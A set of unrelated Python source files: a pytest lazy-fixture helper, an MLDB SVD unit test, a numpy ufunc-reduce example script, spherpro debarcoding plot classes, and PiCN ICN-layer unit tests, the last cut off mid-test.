return [(key, params[key]) for key in (free_fm + non_free_fm_list)]
def _sorted_argnames(params, fixturenames):
argnames = set(params.keys())
for name in fixturenames:
if name in argnames:
argnames.remove(name)
yield name
if argnames:
for name in argnames:
yield name
def _tree_to_list(trees, leave):
lst = []
for l in trees[leave]:
lst.append(l)
lst.extend(
_tree_to_list(trees, l)
)
return lst
def lazy_fixture(names):
if isinstance(names, string_type):
return LazyFixture(names)
else:
return [LazyFixture(name) for name in names]
def is_lazy_fixture(val):
return isinstance(val, LazyFixture)
class LazyFixture(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return '<{} "{}">'.format(self.__class__.__name__, self.name)
def __eq__(self, other):
return self.name == other.name
|
<filename>testing/MLDB-1937-svd-with-complex-select.py
#
# MLDB-1937-svd-with-complex-select.py
# <NAME>, 2016-09-14
# This file is part of MLDB. Copyright 2016 mldb.ai inc. All rights reserved.
#
import random
from mldb import mldb, MldbUnitTest, ResponseException
class MLDB1937SvdWithComplexSelect(MldbUnitTest): # noqa
@classmethod
def setUpClass(cls):
dataset = mldb.create_dataset({
"type": "tabular",
"id": "data"
})
for r in range(100):
rand = random.randint(0, 100)
dataset.record_row(
"r%d"%r,
[ ["a", rand, 0], ["b", "test" if rand % 3 == 0 else "TEST" if rand % 3 == 1 else "Lombric", 0] ]
)
dataset.commit()
def test_svd_with_function_calls(self):
# this is using the fact that SVD training on string values
# creates a new sparse column for each string value seens
mldb.put('/v1/procedures/train_svd', {
"type" : "svd.train",
"params" : {
"trainingData": "select a, lower(b) from data",
"rowOutputDataset": "svd_row_embedding",
"columnOutputDataset": "svd_column_embedding",
"modelFileUrl": "file://tmp/MLDB-1937-svd-with-complex-select.svd"
}
})
# column rowName_, a, lower(b).stringEquals.test and lower(b).stringEquals.lombric
self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 4)
def test_svd_with_aritmetic_ops(self):
mldb.put('/v1/procedures/train_svd', {
"type" : "svd.train",
"params" : {
"trainingData": "select a + 2, b from data",
"rowOutputDataset": "svd_row_embedding",
"columnOutputDataset" : "svd_column_embedding"
}
})
self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 5)
def test_svd_with_column_expression(self):
mldb.put('/v1/procedures/train_svd', {
"type" : "svd.train",
"params" : {
"trainingData": "select column expr(where rowCount() = 100) from data",
"rowOutputDataset": "svd_row_embedding",
"columnOutputDataset" : "svd_column_embedding"
}
})
self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 5)
mldb.put('/v1/procedures/train_svd', {
"type" : "svd.train",
"params" : {
"trainingData": "select column expr(where columnName() = 'a') from data",
"rowOutputDataset": "svd_row_embedding",
"columnOutputDataset" : "svd_column_embedding"
}
})
mldb.log(mldb.query("select * from svd_column_embedding"))
self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 1)
mldb.put('/v1/procedures/train_svd', {
"type" : "svd.train",
"params" : {
"trainingData": "select column expr(where columnName() = 'b') from data",
"rowOutputDataset": "svd_row_embedding",
"columnOutputDataset" : "svd_column_embedding"
}
})
self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 4)
if __name__ == '__main__':
mldb.run_tests()
|
#Is it possible to use numpy.ufunc.reduce over an iterator of ndarrays?
#I have a generator function that yields ndarrays (all of the same shape and dtype) and I would like to find the maximum value at each index.
#Currently I have code that looks like this:
def main():
import numpy as np
import cv2
shape = (250, 300)
dsize = shape[::-1]
affmat_list = np.array([
[[ 1.57351554e+00, 0.00000000e+00, 1.09061039e+02],
[ -3.61827926e-01, 7.46059970e-01, 2.50669551e+01]],
[[ 3.05754491e+00, 0.00000000e+00, 8.28024922e+01],
[ -2.13866309e-01, 1.72124200e+00, 1.72744669e+02]],
[[ 2.58008254e+00, 0.00000000e+00, 1.52155447e+02],
[ -2.08041241e+00, 2.46195663e+00, 1.09493821e+02]],
[[ 2.01791864e+00, 0.00000000e+00, 2.45704669e+02],
[ -1.07590956e+00, 3.33499949e+00, 1.66233498e+02]],
[[ 3.32012638e+00, 0.00000000e+00, 1.03847866e+02],
[ -2.36557589e+00, 3.02063109e+00, 1.59907802e+02]],
[[ 4.94371474e+00, 0.00000000e+00, 7.92717193e+01],
[ -2.67846198e+00, 3.66854256e+00, 1.47888210e+02]]])
fx2_score = np.ones(len(affmat_list))
patch = np.array([
[ 0.0014, 0.0016, 0.0017, 0.0019, 0.0020, 0.0021, 0.0022, 0.0023, 0.0023, 0.0023, 0.0023, 0.0023, 0.0022, 0.0021, 0.0020, 0.0019, 0.0017, 0.0016, 0.0014],
[ 0.0016, 0.0017, 0.0019, 0.0021, 0.0022, 0.0023, 0.0024, 0.0025, 0.0026, 0.0026, 0.0026, 0.0025, 0.0024, 0.0023, 0.0022, 0.0021, 0.0019, 0.0017, 0.0016],
[ 0.0017, 0.0019, 0.0021, 0.0023, 0.0024, 0.0026, 0.0027, 0.0028, 0.0028, 0.0028, 0.0028, 0.0028, 0.0027, 0.0026, 0.0024, 0.0023, 0.0021, 0.0019, 0.0017],
[ 0.0019, 0.0021, 0.0023, 0.0025, 0.0026, 0.0028, 0.0029, 0.0030, 0.0031, 0.0031, 0.0031, 0.0030, 0.0029, 0.0028, 0.0026, 0.0025, 0.0023, 0.0021, 0.0019],
[ 0.0020, 0.0022, 0.0024, 0.0026, 0.0028, 0.0030, 0.0031, 0.0032, 0.0033, 0.0033, 0.0033, 0.0032, 0.0031, 0.0030, 0.0028, 0.0026, 0.0024, 0.0022, 0.0020],
[ 0.0021, 0.0023, 0.0026, 0.0028, 0.0030, 0.0032, 0.0033, 0.0034, 0.0035, 0.0035, 0.0035, 0.0034, 0.0033, 0.0032, 0.0030, 0.0028, 0.0026, 0.0023, 0.0021],
[ 0.0022, 0.0024, 0.0027, 0.0029, 0.0031, 0.0033, 0.0034, 0.0036, 0.0036, 0.0036, 0.0036, 0.0036, 0.0034, 0.0033, 0.0031, 0.0029, 0.0027, 0.0024, 0.0022],
[ 0.0023, 0.0025, 0.0028, 0.0030, 0.0032, 0.0034, 0.0036, 0.0037, 0.0037, 0.0038, 0.0037, 0.0037, 0.0036, 0.0034, 0.0032, 0.0030, 0.0028, 0.0025, 0.0023],
[ 0.0023, 0.0026, 0.0028, 0.0031, 0.0033, 0.0035, 0.0036, 0.0037, 0.0038, 0.0038, 0.0038, 0.0037, 0.0036, 0.0035, 0.0033, 0.0031, 0.0028, 0.0026, 0.0023],
[ 0.0023, 0.0026, 0.0028, 0.0031, 0.0033, 0.0035, 0.0036, 0.0038, 0.0038, 0.0039, 0.0038, 0.0038, 0.0036, 0.0035, 0.0033, 0.0031, 0.0028, 0.0026, 0.0023],
[ 0.0023, 0.0026, 0.0028, 0.0031, 0.0033, 0.0035, 0.0036, 0.0037, 0.0038, 0.0038, 0.0038, 0.0037, 0.0036, 0.0035, 0.0033, 0.0031, 0.0028, 0.0026, 0.0023],
[ 0.0023, 0.0025, 0.0028, 0.0030, 0.0032, 0.0034, 0.0036, 0.0037, 0.0037, 0.0038, 0.0037, 0.0037, 0.0036, 0.0034, 0.0032, 0.0030, 0.0028, 0.0025, 0.0023],
[ 0.0022, 0.0024, 0.0027, 0.0029, 0.0031, 0.0033, 0.0034, 0.0036, 0.0036, 0.0036, 0.0036, 0.0036, 0.0034, 0.0033, 0.0031, 0.0029, 0.0027, 0.0024, 0.0022],
[ 0.0021, 0.0023, 0.0026, 0.0028, 0.0030, 0.0032, 0.0033, 0.0034, 0.0035, 0.0035, 0.0035, 0.0034, 0.0033, 0.0032, 0.0030, 0.0028, 0.0026, 0.0023, 0.0021],
[ 0.0020, 0.0022, 0.0024, 0.0026, 0.0028, 0.0030, 0.0031, 0.0032, 0.0033, 0.0033, 0.0033, 0.0032, 0.0031, 0.0030, 0.0028, 0.0026, 0.0024, 0.0022, 0.0020],
[ 0.0019, 0.0021, 0.0023, 0.0025, 0.0026, 0.0028, 0.0029, 0.0030, 0.0031, 0.0031, 0.0031, 0.0030, 0.0029, 0.0028, 0.0026, 0.0025, 0.0023, 0.0021, 0.0019],
[ 0.0017, 0.0019, 0.0021, 0.0023, 0.0024, 0.0026, 0.0027, 0.0028, 0.0028, 0.0028, 0.0028, 0.0028, 0.0027, 0.0026, 0.0024, 0.0023, 0.0021, 0.0019, 0.0017],
[ 0.0016, 0.0017, 0.0019, 0.0021, 0.0022, 0.0023, 0.0024, 0.0025, 0.0026, 0.0026, 0.0026, 0.0025, 0.0024, 0.0023, 0.0022, 0.0021, 0.0019, 0.0017, 0.0016],
[ 0.0014, 0.0016, 0.0017, 0.0019, 0.0020, 0.0021, 0.0022, 0.0023, 0.0023, 0.0023, 0.0023, 0.0023, 0.0022, 0.0021, 0.0020, 0.0019, 0.0017, 0.0016, 0.0014]
])
def warped_patch_generator():
padded_patch = np.zeros(shape, dtype=np.float32)
patch_h, patch_w = patch.shape
warped = np.zeros(shape, dtype=np.float32)
for count, (M, score) in enumerate(zip(affmat_list, fx2_score)):
print(count)
np.multiply(patch, score, out=padded_patch[:patch.shape[0], :patch.shape[1]] )
cv2.warpAffine(padded_patch, M, dsize, dst=warped,
flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT,
borderValue=0)
yield warped
#yield warped
print("THREE")
from six.moves import reduce
import functools
dstimg3 = np.zeros(shape, dtype=np.float32)
maximum_partial = functools.partial(np.maximum, out=dstimg3)
dstimg3 = reduce(maximum_partial, warped_patch_generator())
print("ONE")
dstimg1 = np.zeros(shape, dtype=np.float32)
print("ONE")
for warped in warped_patch_generator():
#dstimg1 = np.maximum(dstimg1, warped)
np.maximum(dstimg1, warped, out=dstimg1)
print("FOUR")
input_copy_ = np.array([w.copy() for w in warped_patch_generator()])
dstimg4 = input_copy_.max(0)
print("TWO")
dstimg2 = np.zeros(shape, dtype=np.float32)
input_iter_ = list((w for w in warped_patch_generator()))
np.maximum.reduce(input_iter_, axis=0, dtype=np.float32, out=dstimg2)
x = np.where(dstimg1.ravel() != dstimg2.ravel())[0]
print(dstimg2.take(x))
print(dstimg1.take(x))
np.allclose(dstimg1, dstimg2)
import matplotlib.pyplot as plt
plt.figure(1)
plt.subplot(221)
plt.imshow(dstimg1)
plt.subplot(222)
plt.imshow(dstimg2)
plt.subplot(223)
plt.imshow(dstimg3)
plt.subplot(224)
plt.imshow(dstimg4)
plt.show()
if __name__ == '__main__':
main()
#I would have thought that I would be allowed to write something like this:
# dstimg = np.maximum.reduce(warped_patch_generator())
|
<reponame>BodenmillerGroup/spherpro<gh_stars>1-10
import colorcet
import matplotlib.colors as mcolors
import matplotlib.pyplot as plt
import pandas as pd
import spherpro.bromodules.plot_base as plot_base
import spherpro.db as db
LABEL_CBAR = "# of all cells with valid barcodes"
LABEL_Y = "# of cells with\nmost prominent barcode"
LABEL_X = "# of cells with second most prominent barcode"
PLT_TITLE = "Debarcoding Quality"
CBAR_HUE = db.images.bc_valid.key
class PlotDebarcodeCells(plot_base.BasePlot):
def __init__(self, bro):
super().__init__(bro)
def plot_debarcoded_cells(
self,
img_id,
color_invalid="#F8F8F8",
base_colormap=colorcet.glasbey,
colorbar=False,
ax=None,
title=None,
**kwargs,
):
# get the conditions of the block
blockid = (
self.session.query(db.sampleblocks).join(db.conditions).join(db.images)
).subquery()
unicols = [
c[0]
for c in self.session.query(db.conditions.condition_id)
.filter(db.conditions.sampleblock_id == blockid.c.sampleblock_id)
.all()
]
cmap = [color_invalid] + base_colormap
ncol = max(unicols) + 1
mymap = mcolors.LinearSegmentedColormap.from_list("my_colormap", cmap, N=ncol)
if title is None:
title = f"ImgId: {img_id}"
# TODO: get barcoding variable names from the debarcoding module.
return self.bro.plots.heatmask.plt_heatplot(
[img_id],
"barcode",
"ObjectStack",
"object",
title=title,
transform=None,
colorbar=colorbar,
cmap=mymap,
ax=ax,
crange=[0, ncol - 1],
**kwargs,
)
class PlotDebarcodeQuality(plot_base.BasePlot):
def __init__(self, bro):
super().__init__(bro)
# make the dependency explicit
def quality_plot(self, filename=None, show=None, cm=None):
"""
Plots a quality Plot for the debarcoding. This function requires
a debarcoded dataset!
Args:
str filename: if specified, saves the plot to the location
bool show: should plt.show be executed? default False
cm: color map to use
Returns:
plt, ax from plot
"""
if show is None:
show = False
if not self.bro.is_debarcoded:
raise NameError("Please use a debarcoded dataset or debarcode this one!")
# get data
table, zeros = self._get_data()
# plot data
plt, ax = self._produce_plot(table, zeros, cm=cm)
if filename is not None:
plt.savefig(filename)
else:
if show:
plt.show()
return plt, ax
def _get_data(self):
q = self.data.main_session.query(db.images)
zeros = q.filter(db.images.condition_id == None).count()
q = q.filter(db.images.condition_id.isnot(None)).statement
table = pd.read_sql_query(q, self.data.db_conn)
return table, zeros
def _produce_plot(self, data, zeros, cm=None):
fig, ax = plt.subplots()
if cm is None:
cm = plt.cm.get_cmap("winter")
y = data[db.images.bc_highest_count.key]
x = data[db.images.bc_second_count.key]
sc = ax.scatter(x, y, alpha=0.7, edgecolors="none", c=data[CBAR_HUE], cmap=cm)
upper = max(x.max() * 1.1, y.max() * 1.1)
ax.set_xlim([0, upper])
ax.set_ylim([0, upper])
# ax.legend()
ax.grid(True)
ax.set_aspect(1)
plt.plot(
[0, upper],
[0, upper],
"k-",
c="grey",
lw=1,
alpha=0.5,
label="_not in legend",
)
cbar = plt.colorbar(sc)
cbar.set_label(LABEL_CBAR)
plt.ylabel(LABEL_Y)
plt.xlabel(LABEL_X)
plt.title(PLT_TITLE)
return plt, ax
|
"""Test the Basic ICN Layer implementation"""
import multiprocessing
import time
import unittest
from PiCN.Layers.ICNLayer import BasicICNLayer
from PiCN.Layers.ICNLayer.ContentStore import ContentStoreMemoryExact
from PiCN.Layers.ICNLayer.ForwardingInformationBase import ForwardingInformationBaseMemoryPrefix
from PiCN.Layers.ICNLayer.PendingInterestTable import PendingInterstTableMemoryExact
from PiCN.Packets import Name, Interest, Content, Nack, NackReason
from PiCN.Processes import PiCNSyncDataStructFactory
class test_BasicICNLayer(unittest.TestCase):
"""Test the Basic ICN Layer implementation"""
def setUp(self):
#setup icn_layer
self.icn_layer = BasicICNLayer(log_level=255)
synced_data_struct_factory = PiCNSyncDataStructFactory()
synced_data_struct_factory.register("cs", ContentStoreMemoryExact)
synced_data_struct_factory.register("fib", ForwardingInformationBaseMemoryPrefix)
synced_data_struct_factory.register("pit", PendingInterstTableMemoryExact)
synced_data_struct_factory.create_manager()
cs = synced_data_struct_factory.manager.cs()
fib = synced_data_struct_factory.manager.fib()
pit = synced_data_struct_factory.manager.pit()
cs.set_cs_timeout(2)
pit.set_pit_timeout(2)
pit.set_pit_retransmits(2)
self.icn_layer.cs = cs
self.icn_layer.fib = fib
self.icn_layer.pit = pit
#setup queues icn_routing layer
self.queue1_icn_routing_up = multiprocessing.Queue()
self.queue1_icn_routing_down = multiprocessing.Queue()
#add queues to ICN layer
self.icn_layer.queue_from_lower = self.queue1_icn_routing_up
self.icn_layer.queue_to_lower = self.queue1_icn_routing_down
def tearDown(self):
self.icn_layer.stop_process()
def test_ICNLayer_interest_forward_basic(self):
"""Test ICN layer with no CS and PIT entry"""
self.icn_layer.start_process()
to_faceid = 1
from_faceid = 2
#Add entry to the fib
name = Name("/test/data")
interest = Interest("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_faceid], static=True)
#forward entry
self.queue1_icn_routing_up.put([from_faceid, interest])
try:
faceid, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
#check output
self.assertEqual(faceid, to_faceid)
self.assertEqual(data, interest)
#check data structures
self.assertEqual(self.icn_layer.cs.get_container_size(), 0)
self.assertEqual(self.icn_layer.fib.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).faceid, [to_faceid])
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).name, name)
self.assertEqual(self.icn_layer.pit.find_pit_entry(name).faceids[0], from_faceid)
self.assertEqual(self.icn_layer.pit.find_pit_entry(name).name, name)
def test_ICNLayer_interest_forward_longest_match(self):
"""Test ICN layer with no CS and no PIT entry and longest match"""
self.icn_layer.start_process()
to_face_id = 1
from_face_id = 2
#Add entry to the fib
name = Name("/test")
interest = Interest("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_face_id], static=True)
#forward entry
self.queue1_icn_routing_up.put([from_face_id, interest])
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
#check output
self.assertEqual(face_id, to_face_id)
self.assertEqual(data, interest)
#check data structures
self.assertEqual(self.icn_layer.cs.get_container_size(), 0)
self.assertEqual(self.icn_layer.fib.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).faceid, [to_face_id])
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).name, name)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest.name).faceids[0], from_face_id)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest.name).name, interest.name)
def test_ICNLayer_interest_forward_deduplication(self):
"""Test ICN layer with no CS and no PIT entry and deduplication"""
self.icn_layer.start_process()
to_face_id = 1
from_face_id_1 = 2
from_face_id_2 = 3
# Add entry to the fib
name = Name("/test")
interest1 = Interest("/test/data")
interest2 = Interest("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_face_id])
# forward entry
self.queue1_icn_routing_up.put([from_face_id_1, interest1])
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
self.queue1_icn_routing_up.put([from_face_id_2, interest2], block=True)
self.assertTrue(self.queue1_icn_routing_down.empty())
time.sleep(3)
# check output
self.assertEqual(face_id, to_face_id)
self.assertEqual(data, interest1)
time.sleep(0.3) # sleep required, since there is no blocking get before the checks
# check data structures
self.assertEqual(self.icn_layer.cs.get_container_size(), 0)
self.assertEqual(self.icn_layer.fib.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).faceid, [to_face_id])
self.assertEqual(self.icn_layer.fib.find_fib_entry(name).name, name)
self.assertEqual(len(self.icn_layer.pit.find_pit_entry(interest1.name).faceids), 2)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest1.name).faceids, [from_face_id_1, from_face_id_2])
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest1.name).name, interest1.name)
def test_ICNLayer_interest_forward_content_match(self):
"""Test ICN layer with CS entry matching"""
self.icn_layer.start_process()
from_face_id = 2
interest = Interest("/test/data")
#add content
content = Content("/test/data")
self.icn_layer.cs.add_content_object(content)
#request content
self.queue1_icn_routing_up.put([from_face_id, interest])
#get content
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data, content)
self.assertEqual(face_id, from_face_id)
def test_ICNLayer_interest_forward_content_no_match(self):
"""Test ICN layer with CS entry no match"""
self.icn_layer.start_process()
to_face_id = 1
from_face_id = 2
interest = Interest("/test/data/bla")
name = Name("/test/data")
self.icn_layer.fib.add_fib_entry(name, [to_face_id], static=True)
#add content
content = Content("/test/data")
self.icn_layer.cs.add_content_object(content)
#request content
self.queue1_icn_routing_up.put([from_face_id, interest])
#get data from fib
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
self.assertTrue(data, interest)
self.assertTrue(face_id, to_face_id)
self.assertTrue(self.queue1_icn_routing_up.empty())
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.find_pit_entry(interest.name).name, interest.name)
def test_ICNLayer_content_no_pit(self):
"""Test receiving a content object with no PIT entry"""
self.icn_layer.start_process()
from_face_id = 2
content = Content("/test/data")
self.queue1_icn_routing_up.put([from_face_id, content])
self.assertTrue(self.queue1_icn_routing_down.empty())
def test_ICNLayer_content_pit(self):
"""Test receiving a content object with PIT entry"""
self.icn_layer.start_process()
content_in_face_id = 1
from_face_id = 2
name = Name("/test/data")
content = Content("/test/data")
self.icn_layer.pit.add_pit_entry(name, from_face_id, content_in_face_id, None, None)
self.queue1_icn_routing_up.put([content_in_face_id, content])
try:
face_id, data = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
self.assertEqual(face_id, from_face_id)
self.assertEqual(data, content)
def test_ICNLayer_content_two_pit_entries(self):
"""Test receiving a content object with two PIT entries"""
self.icn_layer.start_process()
content_in_face_id = 1
from_face_id_1 = 2
from_face_id_2 = 3
name = Name("/test/data")
content = Content("/test/data")
self.icn_layer.pit.add_pit_entry(name, from_face_id_1, content_in_face_id, None, False)
self.icn_layer.pit.add_pit_entry(name, from_face_id_2, content_in_face_id, None, False)
self.queue1_icn_routing_up.put([content_in_face_id, content])
try:
face_id_1, data1 = self.queue1_icn_routing_down.get(timeout=2.0)
except:
self.fail()
self.assertEqual(face_id_1, from_face_id_1)
self.assertEqual(data1, content)
face_id_2, data2 = self.queue1_icn_routing_down.get()
self.assertEqual(face_id_2, from_face_id_2)
self.assertEqual(data2, content)
def test_ICNLayer_ageing_pit(self):
"""Test PIT ageing"""
self.icn_layer.start_process()
from_face_id_1 = 1
to_face_id = 2
name = Name("/test/data")
interest = Interest(name)
self.icn_layer.fib.add_fib_entry(name, [to_face_id])
self.icn_layer.pit.add_pit_entry(name, from_face_id_1, to_face_id, interest, False)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(self.icn_layer.pit.find_pit_entry(name).name, name)
# test retransmit 1
self.icn_layer.ageing()
time.sleep(0.1)
self.assertFalse(self.icn_layer.queue_to_lower.empty())
try:
rface_id, rinterest = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(rface_id, to_face_id)
self.assertEqual(rinterest, interest)
# test retransmit 2
self.icn_layer.ageing()
time.sleep(0.1)
self.assertFalse(self.icn_layer.queue_to_lower.empty())
try:
rface_id, rinterest = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(rface_id, to_face_id)
self.assertEqual(rinterest, interest)
# Wait for timeout
time.sleep(2)
# test retransmit 3 to get number of retransmit
self.icn_layer.ageing()
time.sleep(0.1)
self.assertFalse(self.icn_layer.queue_to_lower.empty())
try:
rface_id, rinterest = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
self.assertEqual(rface_id, to_face_id)
self.assertEqual(rinterest, interest)
# test remove pit entry
self.icn_layer.ageing()
# nack = self.icn_layer.queue_to_lower.get(timeout=8.0) # invalid, no PIT Timeout Nack anymore
# self.assertEqual(nack, [1, Nack(rinterest.name, NackReason.PIT_TIMEOUT, rinterest)])
self.assertTrue(self.icn_layer.queue_to_lower.empty())
self.assertEqual(self.icn_layer.pit.get_container_size(), 0)
def test_ICNLayer_ageing_cs(self):
"""Test CS ageing and static entries"""
self.icn_layer.start_process()
name1 = Name("/test/data")
content1 = Content(name1, "HelloWorld")
name2 = Name("/data/test")
content2 = Content(name2, "Goodbye")
self.icn_layer.cs.add_content_object(content1)
self.icn_layer.cs.add_content_object(content2, static=True)
self.assertEqual(self.icn_layer.cs.get_container_size(), 2)
self.assertEqual(self.icn_layer.cs.find_content_object(name1).content, content1)
self.assertEqual(self.icn_layer.cs.find_content_object(name2).content, content2)
#Test aging 1
self.icn_layer.ageing()
self.assertEqual(self.icn_layer.cs.get_container_size(), 2)
self.assertEqual(self.icn_layer.cs.find_content_object(name1).content, content1)
self.assertEqual(self.icn_layer.cs.find_content_object(name2).content, content2)
time.sleep(2)
# Test aging 2
self.icn_layer.ageing()
self.assertEqual(self.icn_layer.cs.get_container_size(), 1)
self.assertEqual(self.icn_layer.cs.find_content_object(name2).content, content2)
def test_ICNLayer_content_from_app_layer_no_pit(self):
"""get content from app layer when there is no pit entry available"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer.start_process()
n = Name("/test/data")
c = Content(n, "HelloWorld")
self.icn_layer.queue_from_higher.put([0, c])
time.sleep(1)
self.assertTrue(self.queue1_icn_routing_down.empty())
def test_ICNLayer_content_from_app_layer(self):
"""get content from app layer when there is a pit entry available"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer.start_process()
face_id = 1
n = Name("/test/data")
self.icn_layer.pit.add_pit_entry(n, face_id, -1)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
c = Content(n, "HelloWorld")
self.icn_layer.queue_from_higher.put([0, c])
try:
data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data, [face_id, c])
def test_ICNLayer_content_to_app_layer_no_pit(self):
"""get content to app layer no pit"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer.start_process()
from_face_id = 1
n = Name("/test/data")
c = Content(n, "HelloWorld")
self.icn_layer.queue_from_lower.put([from_face_id, c])
time.sleep(1)
self.assertTrue(self.icn_layer.queue_to_higher.empty())
def test_ICNLayer_content_to_app_layer(self):
"""get content to app layer"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer.start_process()
face_id = -1
from_face_id = 1
n = Name("/test/data")
self.icn_layer.pit.add_pit_entry(n, face_id, -1, interest=None, local_app=True)
self.assertEqual(self.icn_layer.pit.get_container_size(), 1)
c = Content(n, "HelloWorld")
self.icn_layer.queue_from_lower.put([from_face_id, c])
try:
data = self.icn_layer.queue_to_higher.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data, [1, c])
def test_ICNLayer_interest_from_app_layer_no_pit(self):
"""Test sending and interest message from APP with no PIT entry"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer._interest_to_app=True
self.icn_layer.start_process()
face_id = 1
n = Name("/test/data")
i = Interest(n)
self.icn_layer.fib.add_fib_entry(n, [face_id], True)
self.icn_layer.queue_from_higher.put([0, i])
try:
to_faceid, data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(to_faceid, face_id)
self.assertEqual(i, data)
self.assertEqual(self.icn_layer.pit.find_pit_entry(n).interest, i)
self.assertTrue(self.icn_layer.pit.find_pit_entry(n).local_app[0])
def test_ICNLayer_interest_from_app_layer_pit(self):
"""Test sending and interest message from APP with a PIT entry --> interest not for higher layer"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer._interest_to_app=True
self.icn_layer.start_process()
face_id = 1
from_face_id = 2
n = Name("/test/data")
i = Interest(n)
self.icn_layer.fib.add_fib_entry(n, [face_id], True)
self.icn_layer.pit.add_pit_entry(n, from_face_id, face_id, i, local_app=False)
self.assertFalse(self.icn_layer.pit.find_pit_entry(n).local_app[0])
self.icn_layer.queue_from_higher.put([0, i])
try:
to_face_id, data = self.icn_layer.queue_to_lower.get(timeout=2.0)
except:
self.fail()
self.assertEqual(to_face_id, face_id)
self.assertEqual(i, data)
self.assertEqual(self.icn_layer.pit.find_pit_entry(n).interest, i)
self.assertFalse(self.icn_layer.pit.find_pit_entry(n).local_app[0]) #Just forward, not from local app
def test_ICNLayer_interest_to_app_layer_no_pit(self):
"""Test sending and interest message from APP with no PIT entry"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer._interest_to_app = True
self.icn_layer.start_process()
face_id = 1
from_face_id = 2
n = Name("/test/data")
i = Interest(n)
self.icn_layer.fib.add_fib_entry(n, [face_id], True)
self.icn_layer.queue_from_lower.put([from_face_id, i])
try:
data = self.icn_layer.queue_to_higher.get(timeout=2.0)
except:
self.fail()
self.assertEqual(data[1], i)
self.assertEqual(self.icn_layer.pit.find_pit_entry(n).interest, i)
def test_ICNLayer_interest_to_app_layer_pit(self):
"""Test sending and interest message from APP with a PIT entry"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer._interest_to_app = True
self.icn_layer.start_process()
face_id = [1]
from_face_id = 2
n = Name("/test/data")
i = Interest(n)
self.icn_layer.fib.add_fib_entry(n, face_id, True)
self.icn_layer.pit.add_pit_entry(n, from_face_id, face_id[0], i, local_app=False)
self.icn_layer.queue_from_lower.put([from_face_id, i])
time.sleep(1)
self.assertTrue(self.icn_layer.queue_to_higher.empty()) #--> deduplication by pit entry
def test_ICNLayer_interest_to_app_layer_cs(self):
"""Test sending and interest message from APP with a CS entry"""
queue_to_higher = multiprocessing.Queue()
queue_from_higher = multiprocessing.Queue()
self.icn_layer.queue_to_higher = queue_to_higher
self.icn_layer.queue_from_higher = queue_from_higher
self.icn_layer._interest_to_app = True
self.icn_layer.start_process()
face_id = 1
from_face_id = 2
n = Name("/test/data")
i = Interest(n)
c = Content(n, "Hello World")
self.icn_layer.fib.add_fib_entry(n, [face_id], True)
